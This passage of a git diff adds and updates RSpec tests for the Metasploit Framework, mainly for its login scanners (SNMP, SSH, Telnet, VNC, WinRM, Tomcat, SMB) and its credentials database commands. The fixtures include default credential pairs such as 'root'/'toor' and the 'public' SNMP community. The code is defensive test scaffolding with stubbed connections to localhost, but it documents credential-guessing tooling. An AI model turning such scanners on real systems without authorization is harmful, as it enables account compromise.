+          login_scanner.simple.stub(:connect).with(/.*ipc\$/i)
+        end
+
+        it 'returns a result object with a status of Metasploit::Model::Login::Status::SUCCESSFUL' do
+          login_scanner.stub_chain(:simple, :login).and_return true
+          result = login_scanner.attempt_login(pub_blank)
+          expect(result.status).to eq Metasploit::Model::Login::Status::SUCCESSFUL
+          expect(result.access_level).to_not eq described_class::AccessLevels::ADMINISTRATOR
+        end
+      end
+    end
+  end
+
+end
+
diff --git a/spec/lib/metasploit/framework/login_scanner/snmp_spec.rb b/spec/lib/metasploit/framework/login_scanner/snmp_spec.rb
new file mode 100644
index 0000000000..95c4d85cd8
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/snmp_spec.rb
@@ -0,0 +1,56 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/snmp'
+
+describe Metasploit::Framework::LoginScanner::SNMP do
+  let(:public) { 'public' }
+  let(:private) { nil }
+
+  let(:pub_comm) {
+    Metasploit::Framework::Credential.new(
+        paired: false,
+        public: public,
+        private: private
+    )
+  }
+
+  let(:invalid_detail) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: nil,
+        private: nil
+    )
+  }
+
+  let(:detail_group) {
+    [ pub_comm ]
+  }
+
+  subject(:snmp_scanner) {
+    described_class.new
+  }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: false, has_default_realm: false
+
+
+  context '#attempt_login' do
+    before(:each) do
+      snmp_scanner.host = '127.0.0.1'
+      snmp_scanner.port = 161
+      snmp_scanner.connection_timeout = 1
+      snmp_scanner.stop_on_success = true
+      snmp_scanner.cred_details = detail_group
+    end
+
+    it 'creates a Timeout based on the connection_timeout' do
+      ::Timeout.should_receive(:timeout).at_least(:once).with(snmp_scanner.connection_timeout)
+      snmp_scanner.attempt_login(pub_comm)
+    end
+
+    it 'creates a SNMP Manager for each supported version of SNMP' do
+      ::SNMP::Manager.should_receive(:new).twice.and_call_original
+      snmp_scanner.attempt_login(pub_comm)
+    end
+
+  end
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb b/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb
new file mode 100644
index 0000000000..e36d723c72
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb
@@ -0,0 +1,221 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/ssh'
+
+describe Metasploit::Framework::LoginScanner::SSH do
+  let(:public) { 'root' }
+  let(:private) { 'toor' }
+  let(:key) { OpenSSL::PKey::RSA.generate(2048).to_s }
+
+  let(:pub_blank) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: ''
+    )
+  }
+
+  let(:pub_pub) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: public
+    )
+  }
+
+  let(:pub_pri) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: private
+    )
+  }
+
+  let(:pub_key) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: key,
+        private_type: :ssh_key
+    )
+  }
+
+  let(:invalid_detail) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: nil,
+        private: nil
+    )
+  }
+
+  let(:detail_group) {
+    [ pub_blank, pub_pub, pub_pri]
+  }
+
+  subject(:ssh_scanner) {
+    described_class.new
+  }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: false, has_default_realm: false
+
+
+  it { should respond_to :verbosity }
+
+  context 'validations' do
+
+    context 'verbosity' do
+
+      it 'is valid with :debug' do
+        ssh_scanner.verbosity = :debug
+        expect(ssh_scanner.errors[:verbosity]).to be_empty
+      end
+
+      it 'is valid with :info' do
+        ssh_scanner.verbosity = :info
+        expect(ssh_scanner.errors[:verbosity]).to be_empty
+      end
+
+      it 'is valid with :warn' do
+        ssh_scanner.verbosity = :warn
+        expect(ssh_scanner.errors[:verbosity]).to be_empty
+      end
+
+      it 'is valid with :error' do
+        ssh_scanner.verbosity = :error
+        expect(ssh_scanner.errors[:verbosity]).to be_empty
+      end
+
+      it 'is valid with :fatal' do
+        ssh_scanner.verbosity = :fatal
+        expect(ssh_scanner.errors[:verbosity]).to be_empty
+      end
+
+      it 'is invalid with a random symbol' do
+        ssh_scanner.verbosity = :foobar
+        expect(ssh_scanner).to_not be_valid
+        expect(ssh_scanner.errors[:verbosity]).to include 'is not included in the list'
+      end
+
+      it 'is invalid with a string' do
+        ssh_scanner.verbosity = 'debug'
+        expect(ssh_scanner).to_not be_valid
+        expect(ssh_scanner.errors[:verbosity]).to include 'is not included in the list'
+      end
+    end
+
+
+  end
+
+  context '#attempt_login' do
+    before(:each) do
+      ssh_scanner.host = '127.0.0.1'
+      ssh_scanner.port = 22
+      ssh_scanner.connection_timeout = 30
+      ssh_scanner.verbosity = :fatal
+      ssh_scanner.stop_on_success = true
+      ssh_scanner.cred_details = detail_group
+    end
+
+    it 'creates a Timeout based on the connection_timeout' do
+      ::Timeout.should_receive(:timeout).with(ssh_scanner.connection_timeout)
+      ssh_scanner.attempt_login(pub_pri)
+    end
+
+    context 'with a password' do
+      it 'calls Net::SSH with the correct arguments' do
+        opt_hash = {
+            :auth_methods  => ['password','keyboard-interactive'],
+            :port          => ssh_scanner.port,
+            :disable_agent => true,
+            :password      => private,
+            :config        => false,
+            :verbose       => ssh_scanner.verbosity,
+            :proxies       => nil
+        }
+        Net::SSH.should_receive(:start).with(
+            ssh_scanner.host,
+            public,
+            opt_hash
+        )
+        ssh_scanner.attempt_login(pub_pri)
+      end
+    end
+
+    context 'with a key' do
+      it 'calls Net::SSH with the correct arguments' do
+        opt_hash = {
+            :auth_methods  => ['publickey'],
+            :port          => ssh_scanner.port,
+            :disable_agent => true,
+            :key_data      => key,
+            :config        => false,
+            :verbose       => ssh_scanner.verbosity,
+            :proxies       => nil
+        }
+        Net::SSH.should_receive(:start).with(
+            ssh_scanner.host,
+            public,
+            hash_including(opt_hash)
+        )
+        ssh_scanner.attempt_login(pub_key)
+      end
+    end
+
+    context 'when it fails' do
+
+      it 'returns Metasploit::Model::Login::Status::UNABLE_TO_CONNECT for a Rex::ConnectionError' do
+        Net::SSH.should_receive(:start) { raise Rex::ConnectionError }
+        expect(ssh_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+
+      it 'returns Metasploit::Model::Login::Status::UNABLE_TO_CONNECT for a Rex::AddressInUse' do
+        Net::SSH.should_receive(:start) { raise Rex::AddressInUse }
+        expect(ssh_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+
+      it 'returns :connection_disconnect for a Net::SSH::Disconnect' do
+        Net::SSH.should_receive(:start) { raise Net::SSH::Disconnect }
+        expect(ssh_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+
+      it 'returns :connection_disconnect for a ::EOFError' do
+        Net::SSH.should_receive(:start) { raise ::EOFError }
+        expect(ssh_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+
+      it 'returns :connection_disconnect for a ::Timeout::Error' do
+        Net::SSH.should_receive(:start) { raise ::Timeout::Error }
+        expect(ssh_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+
+      it 'returns [:fail,nil] for a Net::SSH::Exception' do
+        Net::SSH.should_receive(:start) { raise Net::SSH::Exception }
+        expect(ssh_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::INCORRECT
+      end
+
+      it 'returns [:fail,nil] if no socket returned' do
+        Net::SSH.should_receive(:start).and_return nil
+        expect(ssh_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::INCORRECT
+      end
+    end
+
+    context 'when it succeeds' do
+
+      it 'gathers proof of the connections' do
+        Net::SSH.should_receive(:start) {"fake_socket"}
+        my_scanner = ssh_scanner
+        my_scanner.should_receive(:gather_proof)
+        my_scanner.attempt_login(pub_pri)
+      end
+
+      it 'returns a success code and proof' do
+        Net::SSH.should_receive(:start) {"fake_socket"}
+        my_scanner = ssh_scanner
+        my_scanner.should_receive(:gather_proof).and_return(public)
+        expect(my_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::SUCCESSFUL
+      end
+    end
+  end
+
+
+
+end
diff --git a/spec/lib/metasploit/framework/login_scanner/telnet_spec.rb b/spec/lib/metasploit/framework/login_scanner/telnet_spec.rb
new file mode 100644
index 0000000000..fcf80b69ca
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/telnet_spec.rb
@@ -0,0 +1,78 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/telnet'
+
+describe Metasploit::Framework::LoginScanner::Telnet do
+
+  subject(:login_scanner) { described_class.new }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: false, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+  it { should respond_to :banner_timeout }
+  it { should respond_to :telnet_timeout }
+
+  context 'validations' do
+    context 'banner_timeout' do
+      it 'is not valid for a non-number' do
+        login_scanner.banner_timeout = "a"
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:banner_timeout]).to include "is not a number"
+      end
+
+      it 'is not valid for a floating point' do
+        login_scanner.banner_timeout = 5.76
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:banner_timeout]).to include "must be an integer"
+      end
+
+      it 'is not valid for a negative number' do
+        login_scanner.banner_timeout = -8
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:banner_timeout]).to include "must be greater than or equal to 1"
+      end
+
+      it 'is not valid for 0' do
+        login_scanner.banner_timeout = 0
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:banner_timeout]).to include "must be greater than or equal to 1"
+      end
+
+      it 'is valid for a legitimate  number' do
+        login_scanner.port = rand(1000) + 1
+        expect(login_scanner.errors[:banner_timeout]).to be_empty
+      end
+    end
+
+    context 'telnet_timeout' do
+      it 'is not valid for a non-number' do
+        login_scanner.telnet_timeout = "a"
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:telnet_timeout]).to include "is not a number"
+      end
+
+      it 'is not valid for a floating point' do
+        login_scanner.telnet_timeout = 5.76
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:telnet_timeout]).to include "must be an integer"
+      end
+
+      it 'is not valid for a negative number' do
+        login_scanner.telnet_timeout = -8
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:telnet_timeout]).to include "must be greater than or equal to 1"
+      end
+
+      it 'is not valid for 0' do
+        login_scanner.telnet_timeout = 0
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:telnet_timeout]).to include "must be greater than or equal to 1"
+      end
+
+      it 'is valid for a legitimate  number' do
+        login_scanner.port = rand(1000) + 1
+        expect(login_scanner.errors[:telnet_timeout]).to be_empty
+      end
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb b/spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb
new file mode 100644
index 0000000000..ef050c0ba0
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb
@@ -0,0 +1,11 @@
+
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/tomcat'
+
+describe Metasploit::Framework::LoginScanner::Tomcat do
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+  it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP'
+
+end
diff --git a/spec/lib/metasploit/framework/login_scanner/vnc_spec.rb b/spec/lib/metasploit/framework/login_scanner/vnc_spec.rb
new file mode 100644
index 0000000000..ce265dbddd
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/vnc_spec.rb
@@ -0,0 +1,84 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/vnc'
+
+describe Metasploit::Framework::LoginScanner::VNC do
+  let(:private) { 'password' }
+  let(:blank) { '' }
+  let(:test_cred) {
+    Metasploit::Framework::Credential.new( paired: false, private: private )
+  }
+  let(:blank_cred) {
+    Metasploit::Framework::Credential.new( paired: false, private: blank )
+  }
+  subject(:login_scanner) { described_class.new }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: false, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+
+  context '#attempt_login' do
+    it 'creates a new RFB client' do
+      Rex::Proto::RFB::Client.should_receive(:new).and_call_original
+      login_scanner.attempt_login(test_cred)
+    end
+
+    it 'returns a connection_error result when the handshake fails' do
+      Rex::Proto::RFB::Client.any_instance.should_receive(:handshake).and_return false
+      result = login_scanner.attempt_login(test_cred)
+      expect(result.status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+    end
+
+    it 'returns a failed result when authentication fails' do
+      Rex::Proto::RFB::Client.any_instance.should_receive(:handshake).and_return true
+      Rex::Proto::RFB::Client.any_instance.should_receive(:authenticate).with(private).and_return false
+      result = login_scanner.attempt_login(test_cred)
+      expect(result.status).to eq Metasploit::Model::Login::Status::INCORRECT
+    end
+
+    context 'when the socket errors' do
+      it 'returns a connection_error result for an EOFError' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::EOFError
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        expect(result.proof).to eq ::EOFError.new.to_s
+      end
+
+      it 'returns a connection_error result for an Rex::AddressInUse' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Rex::AddressInUse
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        expect(result.proof).to eq ::Rex::AddressInUse.new.to_s
+      end
+
+      it 'returns a connection_error result for an Rex::ConnectionError' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionError
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        expect(result.proof).to eq ::Rex::ConnectionError.new.to_s
+      end
+
+      it 'returns a connection_error result for an Rex::ConnectionTimeout' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionTimeout
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        expect(result.proof).to eq ::Rex::ConnectionTimeout.new.to_s
+      end
+
+      it 'returns a connection_error result for an ::Timeout::Error' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Timeout::Error
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        expect(result.proof).to eq ::Timeout::Error.new.to_s
+      end
+    end
+
+
+
+  end
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb b/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb
new file mode 100644
index 0000000000..a4fc368a70
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/winrm_spec.rb
@@ -0,0 +1,21 @@
+
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/winrm'
+
+describe Metasploit::Framework::LoginScanner::WinRM do
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: true
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+  it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP'
+
+  context "#method=" do
+    subject(:winrm_scanner) { described_class.new }
+
+    it "should raise, warning that the :method can't be changed" do
+      expect { winrm_scanner.method = "GET" }.to raise_error(RuntimeError)
+      expect(winrm_scanner.method).to eq("POST")
+    end
+  end
+
+end
+
diff --git a/spec/lib/metasploit/framework/login_scanner_spec.rb b/spec/lib/metasploit/framework/login_scanner_spec.rb
new file mode 100644
index 0000000000..7b22109bf8
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner_spec.rb
@@ -0,0 +1,56 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner'
+require 'metasploit/framework/login_scanner/http'
+require 'metasploit/framework/login_scanner/smb'
+require 'metasploit/framework/login_scanner/vnc'
+
+describe Metasploit::Framework::LoginScanner do
+
+  subject { described_class.classes_for_service(service) }
+  let(:port) { nil }
+  let(:name) { nil }
+
+  let(:service) do
+    s = double('service')
+    allow(s).to receive(:port) { port }
+    allow(s).to receive(:name) { name }
+    s
+  end
+
+  context "with name 'smb'" do
+    let(:name) { 'smb' }
+
+    it { should include Metasploit::Framework::LoginScanner::SMB }
+    it { should_not include Metasploit::Framework::LoginScanner::HTTP }
+  end
+
+  [ 139, 445 ].each do |foo|
+    context "with port #{foo}" do
+      let(:port) { foo }
+
+      it { should include Metasploit::Framework::LoginScanner::SMB }
+      it { should_not include Metasploit::Framework::LoginScanner::HTTP }
+      it { should_not include Metasploit::Framework::LoginScanner::VNC }
+    end
+  end
+
+  context "with name 'http'" do
+    let(:name) { 'http' }
+
+    it { should include Metasploit::Framework::LoginScanner::HTTP }
+    it { should_not include Metasploit::Framework::LoginScanner::SMB }
+    it { should_not include Metasploit::Framework::LoginScanner::VNC }
+  end
+
+  [ 80, 8080, 8000, 443 ].each do |foo|
+    context "with port #{foo}" do
+      let(:port) { foo }
+
+      it { should include Metasploit::Framework::LoginScanner::HTTP }
+      it { should include Metasploit::Framework::LoginScanner::Axis2 }
+      it { should include Metasploit::Framework::LoginScanner::Tomcat }
+      it { should_not include Metasploit::Framework::LoginScanner::SMB }
+    end
+  end
+
+end
diff --git a/spec/lib/msf/core/framework_spec.rb b/spec/lib/msf/core/framework_spec.rb
index 7c96718f7d..2caf144b3a 100644
--- a/spec/lib/msf/core/framework_spec.rb
+++ b/spec/lib/msf/core/framework_spec.rb
@@ -6,7 +6,7 @@ require 'msf/core/framework'
 describe Msf::Framework do
 
   describe "#version" do
-    CURRENT_VERSION = "4.9.3-dev"
+    CURRENT_VERSION = "4.10.1-dev"
 
     subject do
       described_class.new
diff --git a/spec/lib/msf/core/modules/loader/base_spec.rb b/spec/lib/msf/core/modules/loader/base_spec.rb
index 3f6e69063e..c348fd6e34 100644
--- a/spec/lib/msf/core/modules/loader/base_spec.rb
+++ b/spec/lib/msf/core/modules/loader/base_spec.rb
@@ -1177,10 +1177,22 @@ describe Msf::Modules::Loader::Base do
       end
 
       context 'with namespace_module nil' do
+        #
+        # lets
+        #
+
         let(:namespace_module) do
           nil
         end
 
+        #
+        # Callbacks
+        #
+
+        before(:each) do
+          parent_module.const_set(relative_name, Module.new)
+        end
+
         it 'should remove relative_name' do
           parent_module.should_receive(:remove_const).with(relative_name)
 
diff --git a/spec/lib/msf/core/modules/namespace_spec.rb b/spec/lib/msf/core/modules/namespace_spec.rb
index d0bd0843c7..308e763844 100644
--- a/spec/lib/msf/core/modules/namespace_spec.rb
+++ b/spec/lib/msf/core/modules/namespace_spec.rb
@@ -209,8 +209,8 @@ describe Msf::Modules::Namespace do
       end
 
       context 'with minimum Core version' do
-        it 'should be <= Msf::Framework::VersionCore' do
-          minimum_core_version.should <= Msf::Framework::VersionCore
+        it 'is <= Metasploit::Framework::Core::GEM_VERSION when converted to Gem::Version' do
+          expect(Gem::Version.new(minimum_core_version.to_s)).to be <= Metasploit::Framework::Core::GEM_VERSION
         end
 
         context 'without minimum API version' do
@@ -218,8 +218,8 @@ describe Msf::Modules::Namespace do
             2
           end
 
-          it 'should be > Msf::Framework::VersionAPI' do
-            minimum_api_version.should > Msf::Framework::VersionAPI
+          it 'is > Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do
+            expect(Gem::Version.new(minimum_api_version.to_s)).to be > Metasploit::Framework::API::GEM_VERSION
           end
 
           it_should_behave_like 'Msf::Modules::VersionCompatibilityError'
@@ -239,8 +239,8 @@ describe Msf::Modules::Namespace do
           5
         end
 
-        it 'should be > Msf::Framework::VersionCore' do
-          minimum_core_version.should > Msf::Framework::VersionCore
+        it 'is > Metasploit::Framework::Core::GEM_VERSION when converted to Gem::Version' do
+          expect(Gem::Version.new(minimum_core_version.to_s)).to be > Metasploit::Framework::Core::GEM_VERSION
         end
 
         context 'without minimum API version' do
@@ -248,16 +248,16 @@ describe Msf::Modules::Namespace do
             2
           end
 
-          it 'should be > Msf::Framework::VersionAPI' do
-            minimum_api_version.should > Msf::Framework::VersionAPI
+          it 'is > Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do
+            expect(Gem::Version.new(minimum_api_version.to_s)).to be > Metasploit::Framework::API::GEM_VERSION
           end
 
           it_should_behave_like 'Msf::Modules::VersionCompatibilityError'
         end
 
         context 'with minimum API version' do
-          it 'should be <= Msf::Framework::VersionAPI' do
-            minimum_api_version <= Msf::Framework::VersionAPI
+          it 'is <= Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do
+            expect(Gem::Version.new(minimum_api_version.to_s)).to be <= Metasploit::Framework::API::GEM_VERSION
           end
 
           it_should_behave_like 'Msf::Modules::VersionCompatibilityError'
diff --git a/spec/lib/msf/db_manager/export_spec.rb b/spec/lib/msf/db_manager/export_spec.rb
index 4f5de2e92f..d034343336 100644
--- a/spec/lib/msf/db_manager/export_spec.rb
+++ b/spec/lib/msf/db_manager/export_spec.rb
@@ -79,7 +79,7 @@ describe Msf::DBManager::Export do
           it 'should have Mdm::Module::Detail#disclosure_date from disclosure-date content' do
             node = module_detail_node.at_xpath('disclosure-date')
 
-            Date.parse(node.content).should == module_detail.disclosure_date
+            DateTime.parse(node.content).should == module_detail.disclosure_date
           end
         end
 
diff --git a/spec/lib/msf/db_manager_spec.rb b/spec/lib/msf/db_manager_spec.rb
index 76f215b8df..912e8cef20 100644
--- a/spec/lib/msf/db_manager_spec.rb
+++ b/spec/lib/msf/db_manager_spec.rb
@@ -21,16 +21,16 @@ describe Msf::DBManager do
   it_should_behave_like 'Msf::DBManager::Migration'
   it_should_behave_like 'Msf::DBManager::ImportMsfXml'
 
-  context '#initialize_metasploit_data_models' do
-    def initialize_metasploit_data_models
-      db_manager.initialize_metasploit_data_models
+  context '#add_rails_engine_migration_paths' do
+    def add_rails_engine_migration_paths
+      db_manager.add_rails_engine_migration_paths
     end
 
     it 'should not add duplicate paths to ActiveRecord::Migrator.migrations_paths' do
-      initialize_metasploit_data_models
+      add_rails_engine_migration_paths
 
       expect {
-        initialize_metasploit_data_models
+        add_rails_engine_migration_paths
       }.to_not change {
         ActiveRecord::Migrator.migrations_paths.length
       }
@@ -89,14 +89,6 @@ describe Msf::DBManager do
       end
 
       context 'without modules_caching' do
-        it 'should create a connection' do
-          # in purge_all_module_details
-          # in after(:each)
-          ActiveRecord::Base.connection_pool.should_receive(:with_connection).twice.and_call_original
-
-          purge_all_module_details
-        end
-
         it 'should destroy all Mdm::Module::Details' do
           expect {
             purge_all_module_details
@@ -128,14 +120,6 @@ describe Msf::DBManager do
         true
       end
 
-      it 'should create connection' do
-        # 1st time from with_established_connection
-        # 2nd time from report_session
-        ActiveRecord::Base.connection_pool.should_receive(:with_connection).exactly(2).times
-
-        report_session
-      end
-
       context 'with :session' do
         before(:each) do
           options[:session] = session
@@ -754,8 +738,7 @@ describe Msf::DBManager do
       it { should be_nil }
 
       it 'should not create a connection' do
-        # 1st time for with_established_connection
-        ActiveRecord::Base.connection_pool.should_receive(:with_connection).once
+        ActiveRecord::Base.connection_pool.should_not_receive(:with_connection)
 
         report_session
       end
@@ -1273,40 +1256,25 @@ describe Msf::DBManager do
           false
         end
 
-        it 'should create a connection' do
-          ActiveRecord::Base.connection_pool.should_receive(:with_connection).twice.and_call_original
-
-          update_all_module_details
-        end
-
-        it 'should set framework.cache_thread to current thread and then nil around connection' do
+        it 'should set framework.cache_thread to current thread and then nil' do
           framework.should_receive(:cache_thread=).with(Thread.current).ordered
-          ActiveRecord::Base.connection_pool.should_receive(:with_connection).ordered
           framework.should_receive(:cache_thread=).with(nil).ordered
 
           update_all_module_details
-
-          ActiveRecord::Base.connection_pool.should_receive(:with_connection).ordered.and_call_original
         end
 
-        it 'should set modules_cached to false and then true around connection' do
+        it 'should set modules_cached to false and then true' do
           db_manager.should_receive(:modules_cached=).with(false).ordered
-          ActiveRecord::Base.connection_pool.should_receive(:with_connection).ordered
           db_manager.should_receive(:modules_cached=).with(true).ordered
 
           update_all_module_details
-
-          ActiveRecord::Base.connection_pool.should_receive(:with_connection).ordered.and_call_original
         end
 
-        it 'should set modules_caching to true and then false around connection' do
+        it 'should set modules_caching to true and then false' do
           db_manager.should_receive(:modules_caching=).with(true).ordered
-          ActiveRecord::Base.connection_pool.should_receive(:with_connection).ordered
           db_manager.should_receive(:modules_caching=).with(false).ordered
 
           update_all_module_details
-
-          ActiveRecord::Base.connection_pool.should_receive(:with_connection).ordered.and_call_original
         end
 
         context 'with Mdm::Module::Details' do
@@ -1481,13 +1449,6 @@ describe Msf::DBManager do
         true
       end
 
-      it 'should create connection' do
-        ActiveRecord::Base.connection_pool.should_receive(:with_connection)
-        ActiveRecord::Base.connection_pool.should_receive(:with_connection).and_call_original
-
-        update_module_details
-      end
-
       it 'should call module_to_details_hash to get Mdm::Module::Detail attributes and association attributes' do
         db_manager.should_receive(:module_to_details_hash).and_call_original
 
diff --git a/spec/lib/msf/ui/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/command_dispatcher/db_spec.rb
index 52baca5d93..25319a5456 100644
--- a/spec/lib/msf/ui/command_dispatcher/db_spec.rb
+++ b/spec/lib/msf/ui/command_dispatcher/db_spec.rb
@@ -11,6 +11,37 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
     described_class.new(driver)
   end
 
+  describe "#cmd_creds" do
+    describe "add-password" do
+      let(:username) { "username" }
+      let(:password) { "password" }
+      context "when no core exists" do
+        it "should add a Core" do
+          expect {
+            subject.cmd_creds("add-password", username, password)
+          }.to change{ Metasploit::Credential::Core.count }.by 1
+        end
+      end
+      context "when a core already exists" do
+        before(:each) do
+          priv = FactoryGirl.create(:metasploit_credential_password, data: password)
+          pub = FactoryGirl.create(:metasploit_credential_public, username: username)
+          core = FactoryGirl.create(:metasploit_credential_core,
+                                    origin: FactoryGirl.create(:metasploit_credential_origin_import),
+                                    private: priv,
+                                    public: pub,
+                                    realm: nil,
+                                    workspace: framework.db.workspace)
+        end
+        it "should not add a Core" do
+          expect {
+            subject.cmd_creds("add-password", username, password)
+          }.to_not change{ Metasploit::Credential::Core.count }
+        end
+      end
+    end
+  end
+
   describe "#cmd_workspace" do
     describe "-h" do
       it "should show a help message" do
@@ -73,9 +104,9 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
     describe "-p" do
       before(:each) do
         host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1")
-        FactoryGirl.create(:mdm_service, :host => host, :port => 1024)
-        FactoryGirl.create(:mdm_service, :host => host, :port => 1025)
-        FactoryGirl.create(:mdm_service, :host => host, :port => 1026)
+        FactoryGirl.create(:mdm_service, :host => host, :port => 1024, name: 'Service1', proto: 'udp')
+        FactoryGirl.create(:mdm_service, :host => host, :port => 1025, name: 'Service2', proto: 'tcp')
+        FactoryGirl.create(:mdm_service, :host => host, :port => 1026, name: 'Service3', proto: 'udp')
       end
       it "should list services that are on a given port" do
         db.cmd_services "-p", "1024,1025"
@@ -83,10 +114,10 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
           "Services",
           "========",
           "",
-          "host         port  proto  name  state  info",
-          "----         ----  -----  ----  -----  ----",
-          "192.168.0.1  1024  snmp         open   ",
-          "192.168.0.1  1025  snmp         open   "
+          "host         port  proto  name      state  info",
+          "----         ----  -----  ----      -----  ----",
+          "192.168.0.1  1024  udp    Service1  open   ",
+          "192.168.0.1  1025  tcp    Service2  open   "
         ]
       end
     end
@@ -183,35 +214,31 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
 
   end
 
+=begin
   describe "#cmd_creds" do
     describe "-h" do
       it "should show a help message" do
         db.cmd_creds "-h"
         @output.should =~ [
           "Usage: creds [addr range]",
-          "Usage: creds -a <addr range> -p <port> -t <type> -u <user> -P <pass>",
-          "  -a,--add              Add creds to the given addresses instead of listing",
-          "  -d,--delete           Delete the creds instead of searching",
+          "List credentials. If an address range is given, show only credentials with",
+          "logins on hosts within that range.",
           "  -h,--help             Show this help information",
-          "  -o <file>             Send output to a file in csv format",
-          "  -p,--port <portspec>  List creds matching this port spec",
-          "  -s <svc names>        List creds matching these service names",
-          "  -t,--type <type>      Add a cred of this type (only with -a). Default: password",
-          "  -u,--user             Add a cred for this user (only with -a). Default: blank",
-          "  -P,--password         Add a cred with this password (only with -a). Default: blank",
-          "  -R,--rhosts           Set RHOSTS from the results of the search",
-          "  -S,--search           Search string to filter by",
           "  -c,--columns          Columns of interest",
+          "  -P,--password <regex> List passwords that match this regex",
+          "  -p,--port <portspec>  List creds with logins on services matching this port spec",
+          "  -s <svc names>        List creds matching comma-separated service names",
+          "  -u,--user <regex>     List users that match this regex",
           "Examples:",
-          "  creds               # Default, returns all active credentials",
-          "  creds all           # Returns all credentials active or not",
+          "  creds               # Default, returns all credentials",
           "  creds 1.2.3.4/24    # nmap host specification",
           "  creds -p 22-25,445  # nmap port specification",
-          "  creds 10.1.*.* -s ssh,smb all"
